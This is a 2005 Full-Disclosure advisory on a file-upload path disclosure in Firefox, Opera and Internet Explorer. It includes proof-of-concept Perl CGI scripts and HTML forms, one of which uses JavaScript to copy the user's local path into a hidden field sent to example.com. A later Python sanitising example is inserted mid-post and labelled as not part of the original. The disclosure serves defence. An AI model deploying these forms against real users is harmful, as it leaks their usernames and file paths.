[Full-Disclosure] Multi browser sensitive information disclosure

From: bitlance winter (bitlance_3hotmail.com)
Date: Fri Mar 04 2005 - 02:14:24 CST


Multi browser sensitive information disclosure

I. DESCRIPTION:

Mr. upken disclosed this issue publicly on 19th Feb. 2005.
Here is his advisory (in Japanese):
http://xxx.upken.jp/report/ieup/
I have a few additional details to add to his original advisory.

II. IMPACT:

Disclosure of sensitive information to an unauthorised user.

III. TECHNICAL DETAILS:

RFC 1867 is the standard that defines the "Browse..." button
used to upload files to a Web server.
It introduced the INPUT field type="file", which is that button,
and also specified the multipart/form-data encoding, which can
encapsulate files for upload along with all the other fields
on the upload form.

As Mr. upken mentioned in his advisory, there is a weakness in
"Form-based File Upload in HTML".
"When we use Internet Explorer," he says, "secret or sensitive
information can be exposed by malicious people."

I have tested some examples and found that Firefox, Opera,
and Internet Explorer have the weakness (tested on Windows XP SP2).

IV. Proof of Concept [A].

server-side Perl CGI (ask.cgi)
---------------------------
#!/usr/bin/perl
print "Content-Type: text/html\n\n";

# refuse request bodies larger than 100 KB
die if $ENV{CONTENT_LENGTH} > 100*1024;

$objectname = "RFC1867";          # name of the <input type="file"> field
$boundary = <STDIN>;              # first line of the body is the boundary
$boundary =~ s/\r\n//;
while(<STDIN>){
  # the part header reads:
  # Content-Disposition: form-data; name="RFC1867"; filename="..."
  if($_ =~ /$objectname/){
    s/\r\n//;
    s/"//g;
    @dum = split(/filename=/, $_);
    $rfc1867 = $dum[@dum - 1];    # whatever follows the last "filename="
  }
}
$rfc1867 = &Filtertxt( $rfc1867 );
print "$rfc1867\n";               # echoes the name the browser sent

exit(0);

# strip characters that could be used for HTML injection
sub Filtertxt {
    local( $ft ) = @_;
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return( $ft ) ;
}
---------------------------

client-side FORM
---------------------------
<form name="XA" method="POST" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
---------------------------

NOTE:
The method is "POST".
When we upload some file, %USERNAME%, the local path, etc. are disclosed:
the browser sends the full client-side path in the filename= parameter,
and the CGI echoes it back.
I guess that only IE has a weakness.
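As an added example (not part of the original advisory), here is the server-side handling in Python that a CGI such as ask.cgi should have done: it parses the same multipart body, keeps only a sanitised basename from the filename parameter instead of echoing it, and flags parts in which the browser sent a client-side path. The boundary, the sample body and the file contents are constructed; the same safe_filename() applies to the RFC1867 value that arrives in the query string in PoC [B] and [C].

```python
import re

# Constructed sample body (not from the advisory) for the form in PoC [A]:
# the browser put the user's full local path into the filename parameter.
BOUNDARY = b"----ConstructedBoundary1867"
SAMPLE_BODY = (
    b"------ConstructedBoundary1867\r\n"
    b'Content-Disposition: form-data; name="RFC1867"; '
    b'filename="C:\\Documents and Settings\\alice\\My Documents\\report.txt"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b"hello\r\n"
    b"------ConstructedBoundary1867\r\n"
    b'Content-Disposition: form-data; name="XB"\r\n\r\n'
    b"HIDDEN\r\n"
    b"------ConstructedBoundary1867--\r\n"
)
_DISP_PARAM = re.compile(r';\s*([A-Za-z*-]+)="([^"]*)"')  # name="x"; filename="y"

def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Split a multipart/form-data body into {name, filename, data} parts.
    The delimiter is CRLF + "--" + boundary (boundary comes from Content-Type)."""
    delim, parts = b"\r\n--" + boundary, []
    for chunk in (b"\r\n" + body).split(delim)[1:]:        # [0] is the preamble
        if chunk.startswith(b"--"):                        # closing --boundary--
            break
        head, _, data = chunk[2:].partition(b"\r\n\r\n")   # skip CRLF after delimiter
        params = {}
        for line in head.decode("latin-1").split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                params = dict(_DISP_PARAM.findall(line))
        parts.append({"name": params.get("name"), "filename": params.get("filename"), "data": data})
    return parts

def safe_filename(raw):
    """Return (basename, leaked_path); backslash and '/' both count as separators."""
    if raw is None:
        return None, False
    leaked = bool(re.search(r"[\\/]", raw))                # a client path was sent
    base = re.split(r"[\\/]", raw)[-1]                     # Windows sends backslashes
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).lstrip(".") or "upload"
    return base, leaked

def handle_upload(body: bytes, boundary: bytes) -> list:
    """What the CGI should record: a sanitised name, never the raw client path."""
    out = []
    for p in parse_multipart(body, boundary):
        name, leaked = safe_filename(p["filename"])
        out.append({"name": p["name"], "filename": name, "leaked_path": leaked, "size": len(p["data"])})
    return out
```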

V. Proof of Concept [B].

server-side Perl CGI (named ask2.cgi)
---------------------------
#!/usr/bin/perl

if($ENV{'REQUEST_METHOD'} eq 'POST'){
# reads the submitted variables through POST
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
else{
# reads the submitted variables through GET
$buffer = $ENV{'QUERY_STRING'};
}

# splits the variables at &
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
# sets the name and value of each var
($name, $value) = split(/=/, $pair);
# makes each + into a space
$value =~ tr/+/ /;
# URL decode
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
# filter out bad characters < > " ' % ; ( ) & +
$value = &Filtertxt( $value );
# sets the variables in a hash
$FORM{$name} = $value;
}

# print html
print "Content-Type: text/html\n";
print "\n";
print "$FORM{'XB'}\n";
print "<br>\n";
print "$FORM{'RFC1867'}\n";

exit(0);

sub Filtertxt {
    local( $ft ) = @_;
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return( $ft ) ;
}
---------------------------

client-side FORM
---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
---------------------------

NOTE:
The method is "GET". With GET the browser ignores the enctype and sends the
field values, including the file input's value, in the query string that
ask2.cgi parses.
When we try to upload some file, %USERNAME%, the local path, etc. are disclosed.
I guess that both Opera and IE have a weakness.

V. Proof of Concept [C].
The server-side Perl CGI is the same as in Proof of Concept [B].

client-side FORM
---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload"
onclick="document.XA.XB.value=document.XA.RFC1867.value;return true">
</form>
---------------------------

NOTE:
The method is "GET". The onclick handler copies the file input's value into
the hidden field XB before the form is submitted, so the path travels in an
ordinary text field.
When we try to upload some file, %USERNAME%, the local path, etc. are disclosed.
I guess that all of Firefox, Opera and IE have a weakness
when evil JavaScript is used.

VI. Other browsers on other OSes.
Not tested. But......

VII. Is this a vulnerability?

Once I had used Internet Explorer as an FTP tool.
Today, when I was testing PoC3, browsing for an upload file
using Firefox, I found
"MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg"
and uploaded it to another server.
Then my monitor displayed
C:\Documents and Settings\%USERNAME%\Local Settings\
Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg

Oh, no. YB6J6PY3!
It does not matter. I guess this is NOT a vulnerability, maybe.

VIII. Workaround

Do not upload any file to an untrusted server.
Do not attach any file (while sending webmail, posting to a mailing list, etc.).
Use Firefox with JavaScript disabled.

VIII. Credit

Discovery: upken
Additional Research: bitlance winter

BEST REGARDS.

--
bitlance winter


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html